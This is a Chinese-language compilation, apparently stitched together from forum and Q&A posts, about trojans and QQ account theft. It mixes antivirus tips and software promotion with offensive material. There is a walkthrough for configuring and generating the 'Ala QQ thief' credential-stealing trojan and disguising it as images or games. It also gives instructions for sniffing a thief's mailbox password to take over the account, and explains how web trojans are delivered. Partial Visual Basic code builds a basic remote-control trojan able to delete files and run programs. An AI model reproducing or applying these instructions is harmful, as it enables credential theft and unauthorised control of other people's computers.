遭遇黑客的木马病毒攻击，我们该如何防御

【平时就应该保护好我们的电脑，给一些建议】

1、安装杀毒软件还是必要的，要及时更新病毒库，还要装防火墙（防木马、黑客攻击等），定期杀毒，维护好电脑运行安全；

推荐楼主可以安装腾讯电脑管家，它是免费专业安全软件，杀毒管理二合一(只需要下载一份），占内存小，杀毒好，防护好，无误报误杀。拥有云查杀引擎、反病毒引擎、金山云查杀引擎、AVIRA查杀引擎、小红伞和查杀修复引擎等世界一流杀毒软件内嵌杀毒引擎！

其中软件升级、漏洞修复、垃圾清理，都有自动和定期设置，懒人必备

2、修复漏洞和补丁；打开腾讯电脑管家——工具箱——漏洞修复

3、平时不要上一些不明网站，不要随便下载东西；

4、还要提防随身移动存储设备(如U盘等，最近U盘病毒挺猖獗的）；

5、不进不明不网站，不收奇怪邮件。下载完压缩包文件后先进行病毒扫描

6、关闭不必要的端口

7、要是有时间和精力的话，学一些电脑的常用技巧和知识；

最后，我要说的是，你要是平常的确是很小心，但还是中毒的话，那也是没办法的！（用Ghost备份系统是个不错的选择）

下载木马软件自己的电脑会中毒么？

下载的软件如果没有捆绑木马，那么你运行软件不会中毒。

木马,全称特洛伊木马（Trojan horse），这个词语来源于古希腊神话，在计算机领域是一种客户/服务器程序，是黑客最常用的基于远程控制的工具。目前，比较有名的国产木马有：“冰河”、“广外女生”、“黑洞”、“黑冰”等；国外有名的木马则有：“SubSeven”、“Bo2000(Back Orifice)”、“NetSpy”、“Asylum”等。木马对计算机系统和网络安全危害相当大，因此，如何防范特洛伊木马入侵成为了计算机网络安全的重要内容之一。以下为防范木马入侵方法：

1、不要接收陌生人发来的任何压缩包文件及其他类型文件；

2、对可疑的文件（压缩包）进行杀毒；

3、不要接收任何自己不能确定类型的压缩包文件或者其他类型文件；

4、不要到不良网站下载不良信息文件，并加压安装到你的电脑；

5、电脑定期杀毒；

木马中毒

夺回被人盗走的QQ号码

很多朋友都有过QQ号被盗的经历，即使用“密码保护”功能找回来后，里面的Q币也已经被盗号者洗劫一空，碰到更恶毒的盗号者，还会将你的好友统统删除，朋友们将会永远得离开你。

想过反击吗？什么，反击？别开玩笑了，我们只是菜鸟，不是黑客，我们只会看看网页，聊聊天，连QQ号是怎么被盗的都不知道，还能把盗号者怎么样呢？其实喜欢盗号的所谓“黑客”们，也只是利用了一些现成的盗号工具，只要我们了解了QQ号被盗的过程，就能作出相应防范，甚至由守转攻，给盗号者以致命一击。

一、知己知彼，盗号技术不再神秘 如今，还在持续更新的QQ盗号软件已经所剩无几，其中最为著名，流传最广的则非“啊拉QQ大盗”莫属，目前绝大多数的QQ号被盗事件都是由这个软件引起的。软件的使用条件很简单，只要你有一个支持smtp发信的邮箱或者一个支持asp脚本的网页空间即可。而且该木马可以将盗取的QQ号自动分为靓号和非靓号两种，并将它们分别发送到不同的信箱中，这也是“啊拉QQ大盗”如此流行的原因之一。接下来，便让我们先来了解一下其工作原理，以便从中找到反击的良方。

1、选择盗号模式 下载“啊拉QQ大盗”，解压后有两个文件：alaqq.exe、爱永恒，爱保姆qq.asp。其中alaqq.exe是“啊拉QQ大盗”的配置程序，爱永恒，爱保姆qq.asp是使用“网站收信”模式时需使用的文件。正式使用之前，还需要设置其参数。“邮箱收信”配置：运行alaqq.exe，出现程序的配置界面。在“发信模式选择”选项中选中“邮箱收信”，在“邮箱收信”填写电子邮箱地址（建议使用程序默认的163.com网易的邮箱）。这里以邮箱n12345@163.com（密码n_12345）为例来介绍“邮箱收信”模式时的配置，并进行下文中的测试。此外，在“收信箱（靓）”和“收信箱（普）”中可以填入不同的邮箱地址用来接受QQ靓号和普通QQ号。然后在“发信服务器”下拉框中选择自己邮箱相应的smtp服务器，这里是smtp.163.com。最后填入发信箱的帐号、密码、全称即可。设置完毕后，我们可以来测试一下填写的内容是否正确，点击下方“测试邮箱”按钮，程序将会出现邮箱测试状态。如果测试的项目都显示成功，即可完成邮箱信息配置。“网站收信”配置：除了选择“邮箱收信”模式之外，我们还可以选择“网站收信”模式，让盗取的QQ号码自动上传到指定的网站空间。当然，在使用之前，也需要做一些准备工作。用FTP软件将爱永恒，爱保姆qq.asp上传支持ASP脚本的空间，运行alaqq.exe，在“Asp接口地址”中输入爱永恒，爱保姆qq.asp所在的URL地址，那么，当木马截获QQ号码信息后，就会将其保存于爱永恒，爱保姆qq.asp同目录下的qq.txt文件中。

2、设置木马附加参数接下来我们进行高级设置。如果勾选“运行后关闭QQ”，对方一旦运行“啊拉QQ大盗”生成的木马，QQ将会在60秒后自动关闭，当对方再次登录QQ后，其QQ号码和密码会被木马所截获，并发送到盗号者的邮箱或网站空间中。此外，如果希望该木马被用于网吧环境，那就需要勾选“还原精灵自动转存”，以便系统重起后仍能运行木马。除这两项外，其他保持默认即可。

3、盗取QQ号码信息 配置完“啊拉QQ大盗”，点击程序界面中的“生成木马”，即可生成一个能盗取QQ号码的木马程序。我们可以将该程序伪装成图片、小游戏，或者和其他软件捆绑后进行传播。当有人运行相应的文件后，木马会隐藏到系统中，当系统中有QQ登录时，木马便会开始工作，将相关的号码及密码截取，并按照此前的设置，将这些信息发送到邮箱或者网站空间。

二、练就慧眼，让木马在系统中无处可逃现在，我们已经了解了“啊拉QQ大盗”的一般流程，那么如何才能从系统中发现“啊拉QQ大盗”呢？一般来说，如果碰到了以下几种情况，那就应该小心了。·QQ自动关闭。 ·运行某一程序后其自身消失不见。 ·运行某一程序后杀毒软件自动关闭。 ·访问杀毒软件网站时浏览器被自动关闭。·如果杀毒软件有邮件监控功能的，出现程序发送邮件的警告框。 ·安装有网络防火墙（例如天网防火墙），出现NTdhcp.exe访问网络的警告。出现上述情况的一种或多种，系统就有可能已经感染了“啊拉QQ大盗”。当然，感染了木马并不可怕，我们同样可以将其从系统中清除出去。1、手工查杀木马。发现系统感染了“啊拉QQ大盗”后我们可以手工将其清除。“啊拉QQ大盗”运行后会在系统目录中的system32文件夹下生成一个名为NTdhcp.exe的文件，并在注册表的启动项中加入木马的键值，以便每次系统启动都能运行木马。我们首先要做的就是运行“任务管理器”，结束其中的木马进程“NTdhcp.exe”。然后打开资源管理器中的“文件夹选项”，选择其中的“查看”标签，将其中“隐藏受保护的操作系统文件”选项前面的勾去掉。接着进入系统目录中的system32文件夹，将NTdhcp.exe文件删除。最后进入注册表删除NTdhcp.exe键值，该键值位于HKEY_LOCAL_MACHINE \Software \Microsoft \Windows \Currentversion\Run。2、卸载木马。卸载“啊拉QQ大盗”很简单，只要下载“啊拉QQ大盗”的配置程序，运行后点击其中的“卸载程序”按钮即可将木马完全清除出系统。

三、以退为进，给盗号者以致命一击 忙乎了半天，终于把系统中的“啊拉QQ大盗”彻底清除，那么，面对可恶的盗号者，我们是不是应该给他一个教训呢？

1、利用漏洞，由守转攻 这里所谓的“攻”，并不是直接入侵盗号者的电脑，相信这种“技术活”并不适合大家。这里只是从盗号软件几乎都存在的漏洞入手，从而给盗号者一个教训。 那么这个漏洞是什么呢？从此前对“啊拉QQ大盗”的分析中可以看到，配置部分填写了收取QQ号码信息邮件的邮箱帐号和密码，而邮箱的帐号和密码都是明文保存在木马程序中的。因此，我们可以从生成的木马程序中找到盗号者的邮箱帐号和密码。进而轻松控制盗号者的邮箱，让盗号者偷鸡不成反蚀把米。提示：以上漏洞仅存在于将QQ号码信息以邮件发送方式的木马，如果在配置“啊拉QQ大盗”的过程中选择使用网站接收的方式则不存在该漏洞。

2、网络嗅探，反夺盗号者邮箱当木马截取到QQ号码和密码后，会将这些信息以电子邮件的形式发送到盗号者的邮箱，我们可以从这里入手，在木马发送邮件的过程中将网络数据包截取下来，这个被截获的数据包中就含有盗号者邮箱的帐号和密码。截取数据包时我们可以使用一些网络嗅探软件，这些嗅探软件可以很轻松得截取数据包并自动过滤出密码信息。 ·x-sniff x-sniff是一款命令行下的嗅探工具，嗅探能力十分强大，尤其适合嗅探数据包中的密码信息。将下载下来的x-sniff解压到某个目录中，例如“c：\”，然后运行“命令提示符”，在“命令提示符”中进入x-sniff所在的目录，然后输入命令“xsiff.exe -pass -hide -logpass.log”即可（命令含义：在后台运行x-sniff，从数据包中过滤出密码信息，并将嗅探到的密码信息保存到同目录下的pass.log文件中）。嗅探软件设置完毕，我们就可以正常登录QQ。此时，木马也开始运行起来，但由于我们已经运行x-sniff，木马发出的信息都将被截取。稍等片刻后，进入x-sniff所在的文件夹，打开pass.log，便可以发现x-sniff已经成功嗅探到邮箱的帐户和密码。 ·sinffer可能很多朋友对命令行下的东西都有一种恐惧感，所以我们可以使用图形化的嗅探工具来进行嗅探。例如适合新手使用的sinffer。 运行sinffer之前，我们需要安装WinPcap驱动，否则sinffer将不能正常运行。运行sinffer。首先我们需要为sinffer.exe指定一块网卡，点击工具栏上的网卡图标，在弹出的窗口中选择自己使用的网卡，点“OK”后即可完成配置。确定以上配置后，点击sinffer工具栏中的“开始”按钮，软件即开始了嗅探工作。接下来，我们正常登陆QQ，如果嗅探成功，就会在sinffer的界面中出现捕获的数据包，其中邮箱帐号密码信息被很清晰得罗列了出来。得到盗号者的邮箱帐号和密码以后，我们可以将其中的QQ号码信息邮件全部删除，或者修改他的邮箱密码，给盗号者一个教训，让我们菜鸟也正义一把。

UID84662 帖子101 精华3 优币144 G 阅读权限35 查看详细资料

TOP

undefined

我无意间下载了一个黑客程序，紧接着它就自动帮我下载了N多盗号木马，我查杀不了，怎么办~？

如果真是这样的话,我推荐你重装一个系统.20分钟就好了.真要全部杀完这些木马又耗时间又耗精力.杀完后系统文件也有损坏,毕竟还是不如新的好用.

不小心下载了木马不运行，会中毒吗？

一般木马都分两部分，一部分是平时大家中的木马，就是你一运行可能就会中招，还有种是接收端的。就是黑客那边控制你这边的木马运行，就算你自己不主动去运行，木马也有可能自动运行了。

论坛里破解的软件360报木马怎么办

不一定都是病毒，有些是被人捆绑了些病毒，有些黑客软件的程序的代码，杀毒软件是不会认可的。你可以在电脑上按装个虚拟机，黑客软件可以在虚拟机上玩就保障个电脑的安全！请采纳！谢谢！

网站被黑客挂上木马病毒怎么办?

源码中查找可疑代码,删除

如何识别木马

识别木马有新招，希望这篇文章对你有所帮助。

一、经常看到有玩家说，在输入自己的帐号的时候通故意输错帐号和码。其实这种木马是最早期的木马程序。现在已经很少有编木马程序的程序员，还按照这种监听键盘记录的思路去编写木马程序。现在的木马程序已经发展到通过内存提取数据来获得用户的帐号和密码。大家都知道，不管是传奇还是任何一款程序。它都是有他所特有的数据的（包括玩家的帐号、密码，等级装备资料等等）。这些数据都是会通过本机与游戏服务器取得了验证以后，玩家的角色资料才会出现在玩家的面前。而这些数据在运行的时候都是存放在计算机的内存里面的。木马作者只需要在自己的程序里面加入条件语句就可以取得玩家真实的游戏帐号、密码、角色等级~~~~~，以我自己的计算机知识，这种语句的大概意思应该是：当游戏进程进入到让玩家选择角色的时候再从内存中提取最后一次的帐号、密码、角色等级等资料。也就是说，其实玩家之前所做的故意输错帐号或密码完全是浪费自己的表情、浪费自己的时间。

下边先来说一下木马是如何通过网页进入你的电脑的，相信大家都知道，现在有很多图片木马，EML和EXE木马，其中的图片木马其实很简单，就是把木马exe文件的文件头换成bmp文件的文件头，然后欺骗IE浏览器自动打开该文件，然后利用网页里的一段JAVASCRIPT小程序调用DEBUG把临时文件里的bmp文件还原成木马exe文件并拷贝到启动项里，接下来的事情很简单，你下次启动电脑的时候就是你噩梦的开始了，EML木马更是传播方便，把木马文件伪装成audio/x-wav声音文件，这样你接收到这封邮件的时候只要浏览一下，不需要你点任何连接，windows就会为你代劳自动播放这个他认为是wav的音乐文件，木马就这样轻松的进入你的电脑，这种木马还可以frame到网页里，只要打开网页，木马就会自动运行，另外还有一种方法，就是把木马exe编译到.JS文件里，然后在网页里调用，同样也可以无声无息的入侵你的电脑，这只是些简单的办法，还有远程控制和共享等等漏洞可以钻，知道这些，相信你已经对网页木马已经有了大概了解，

简单防治的方法：

开始-设置-控制面版-添加删除程序-windows安装程序-把附件里的windows scripting host去掉，然后打开Internet Explorer浏览器，点工具-Internet选项-安全-自定义级别，把里面的脚本的3个选项全部禁用，然后把“在中加载程序和文件”禁用，当然这只是简单的防治方法，不过可能影响一些网页的动态java效果，不过为了安全就牺牲一点啦，这样还可以预防一些恶意的网页炸弹和病毒，如果条件允许的话可以加装防火墙，再到微软的网站打些补丁，反正我所知道的网吧用的都是原始安装的windows，很不安全哦，还有尽量少在一些小网站下载一些程序，尤其是一些号称黑客工具的软件，小心盗不着别人自己先被盗了，当然，如果你执意要用的话，号被盗了也应该付出这个代价吧。还有，不要以为装了还原精灵就很安全，据我所知，一般网吧的还原精灵都只还原c:盘即系统区，所以只要木马直接感染你安装在别的盘里的游戏执行文件，你照样逃不掉的。

下边介绍一下木马和如何简单的检查一下是否中了木马。

木马程序一般分为服务器端程序和客户端程序两个部分，当服务器端程序安装在某台连接到网络的电脑后，就能使用客户端程序对其进行登陆。这和PcAnywhere以及NetMeeting的远程控制功能相似。但不同的是，木马是非法取得对对方电脑的控制权，一旦登陆成功，就可以取得管理员级的权利，对方电脑上的资料、密码等是一览无余。不过这种木马一般的“伪黑客”很少使用，因为一不小心就会引火上身，被对方反查过来就会偷鸡不成蚀把米了，一般他们都会采用只有服务器端的小木马，这类木马通常会把截取的密码发到一个免费邮箱里，不需要人为操作，有空去收趟邮件就可以了，这种木马遍布互连网的各个角落，的确防不胜防，由于木马程序众多，加之不断有新版本、新品种产生，使得软件无法完全应付，所以手动检查清除是十分必要的。

木马会想尽一切办法隐藏自己，别指望在任务管理器里看到他们的踪影，有些木马更是会和一些系统进程寄生在一起的，如著名的广外幽灵就是寄生在MsgSrv32.exe里；当然它也会悄无声息地启动，木马会在每次用户启动windows时自动装载服务端，Windows系统启动时自动加载应用程序的方法木马都会用上，如启动组、win.ini、system.ini、注册表等等都是木马藏身之地；下边简单说一下如何检查，点开始-运行，输入：

msconfig回车 就会打开系统配置实用程序，先点system.ini，看看shell=文件名，正确的文件名应该是“explorer.exe”，如果explorer.exe后边还跟有别的程序的话，就要好好检查这个程序了，然后点win.ini，“run=”和“load=”是可能加载“木马”程序的途径，一般情况下，它们的等号后面什么都没有，如果发现后面跟有路径与文件名不是你熟悉的启动文件，你的计算机就可能中上“木马”了，当然你也得看清楚，因为如“AOL木马”，它把自身伪装成command.exe文件，如果不注意可能不会发现它不是真正的系统启动文件；最后点“启动”，检查里面的启动项是不是有不熟悉的，如果你实在不清楚的话可以把他们全部取消，然后重新运行msconfig，看一下有没有取消的启动项重新被选中的，一般木马都会存在于内存中，（就是线程插入，然后隐藏进程的木马，DLL无进程木马就不会驻留在内存里面，我们在下一次中会讲到）所以发现你取消他的启动项就会自动添加上的，然后你就可以逐步添上你的输入法，音量控制，防火墙等软件的启动项了；还有一类木马，他是关联注册表的文件打开方式的，一般木马经常关联.exe，点开始-运行，输入：regedit回车，打开注册表编辑器，点第一条，也就是HKEY_CLASSES_ROOT，找到exefile，看一下\\exefile\\shell\\open\\command里面的默认键值是不是"%1" %* ，如果是一个程序路径的话就一定是中木马了，另外配合两种以上的杀毒软件也是必要的，另外在windows下木马一般很难清除，最后重新启动到dos环境下再进行查杀。

防木马程序、防火墙、及杀毒软件介绍：

1、木马克星： 专业的个人版木马查杀工具;近100%查杀各种类型木马!玩家推荐反木马品牌~!

2、绿鹰PC万能精灵2.91 ：专业的个人版木马查杀工具;近100%查杀各种类型木马!玩家推荐反木马品牌~!

3、Symantec AntiVirus：这个我就不用再介绍了吧，全球最大的杀毒软件！强力推荐8.1企业版。

4、天网防火墙2.51个人版:天网防火墙个人版在网络效率与系统安全上完全采用天网防火墙的设计思想，采用最底层的网络驱动隔绝，其作用层在网络硬件与Windows网络驱动之间，在黑客攻击数据接触Windows网络驱动之前将所有的攻击数据拦截，保护脆弱的Windows网络驱动不会崩溃

看看这个，是用VB编的木马程序

1.“特洛伊木马”有被称为BO， 是在美国一次黑客技术讨论会上由一个黑客组织推出的。它其实是一种客户机/服务器程序，其利用的原理就是：在本机直接启动运行的程序拥有与使用者相同的权限。因此如果能够启动服务器端（即被攻击的计算机）的服务器程序，就可以使用相应的客户端工具客户程序直接控制它了。下面来谈谈如何用VB来实现它。

使用VB建立两个程序，一个为客户端程序Client，一个为服务器端程序systry。

在Client工程中建立一个窗体，加载WinSock控件，称为tcpClient，协议选择TCP，再加入两个文本框，用以输入服务器的IP地址或服务器名，然后建立一个按钮，按下之后就可以对连接进行初始化了，代码如下：

Private Sub cmdConnect_Click()

If Len(Text1.Text) = 0 And Len(Text2.Text) = 0 Then

MsgBox ("请输入主机名或主机IP地址。")

Exit Sub

Else

If Len(Text1.Text) 0 Then

tcpClient.RemoteHost = Text1.Text

Else

tcpClient.RemoteHost = Text2.Text

End If

End If

tcpClient.Connect

Timer1.Enabled = True

End Sub

连接建立之后就可以使用DataArrival事件处理所收到的数据了。

连接建立之后就可以使用DataArrival事件处理所收到的数据了。

在服务器端systry工程也建立一个窗体，加载WinSock控件，称为tcpServer，协议选择TCP，在Form_Load事件中加入如下代码：

Private Sub Form_Load()

tcpServer.LocalPort = 1999

tcpServer.Listen

End Sub

准备应答客户端程序的请求连接，使用ConnectionRequest事件来应答户端程序的请求，代码如下：

Private Sub tcpServer_ConnectionRequest

(ByVal requestID As Long)

If tcpServer.State sckClosed Then

tcpServer.Close‘检查控件的 State 属性是否为关闭的。

End If ’如果不是，在接受新的连接之前先关闭此连接。

tcpServer.Accept requestID

End Sub

这样在客户端程序按下了连接按钮后，服务器端程序的ConnectionRequest事件被触发，执行了以上的代码。如果不出意外，连接就被建立起来了。

2. 建立连接后服务器端的程序通过DataArrival事件接收客户机端程序所发的指令运行既定的程序。如：把服务器端的驱动器名、目录名、文件名等传到客户机端，客户机端接收后用TreeView控件以树状的形式显示出来，浏览服务器端文件目录；强制关闭或重启服务器端的计算机；屏蔽任务栏窗口；屏蔽开始菜单；按照客户机端传过来的文件名或目录名，而删除它；屏蔽热启动键；运行服务器端的任何程序；还包括获取目标计算机屏幕图象、窗口及进程列表；激活、终止远端进程；打开、关闭、移动远端窗口；控制目标计算机鼠标的移动与动作；交换远端鼠标的左右键；在目标计算机模拟键盘输入，下载、上装文件；提取、创建、修改目标计算机系统注册表关键字；在远端屏幕上显示消息。DataArrival事件程序如下：

Private Sub tcpServer_DataArrival

(ByVal bytesTotal As Long)

Dim strData As String

Dim i As Long

Dim mKey As String

tcpServer.GetData strData

‘接收数据并存入strData

For i = 1 To Len(strData)

‘分离strData中的命令

If Mid(strData, i, 1) = "@" Then

mKey = Left(strData, i - 1)

‘把命令ID号存入mKey

‘把命令参数存入strData

strData = Right(strData, Len(strData) - i)

Exit For

End If

Next i

Select Case Val(mKey)

Case 1

‘驱动器名、目录名、文件名

Case 2

强制关闭服务器端的计算机

Case 3

强制重启服务器端的计算机

Case 4

屏蔽任务栏窗口；

Case 5

屏蔽开始菜单；

Case 6

按照客户机端传过来的文件名或目录名，而删除它；

Case 7

屏蔽热启动键；

Case 8

运行服务器端的任何程序

End Select

End Sub

详细程序略。

客户机端用tcpClient.SendData发命令。命令包括命令ID和命令参数，它们用符号“@”隔开。

另外，当客户机端断开与服务器端的来接后，服务器端应用tcpServer_Close事件，来继续准备接收客户机端的请求，其代码如下：

Private Sub tcpServer_Close()

tcpServer.Close

tcpServer.Listen

End Sub

这就是一个最基本的特洛伊木马程序，只要你的机器运行了服务器端程序，那别人就可以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了，在我的源程序中有一中方法，是修改系统注册表的方法。

这就是一个最基本的特洛伊木马程序，只要你的机器运行了服务器端程序，那别人就可以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了，在我的源程序中有一中方法，是修改系统注册表的方法。

成功的特洛伊木马程序要比这个复杂一些，还有程序的隐藏、自动复制、传播等问题要解决。警告：千万不要用BO程序破坏别人的系统。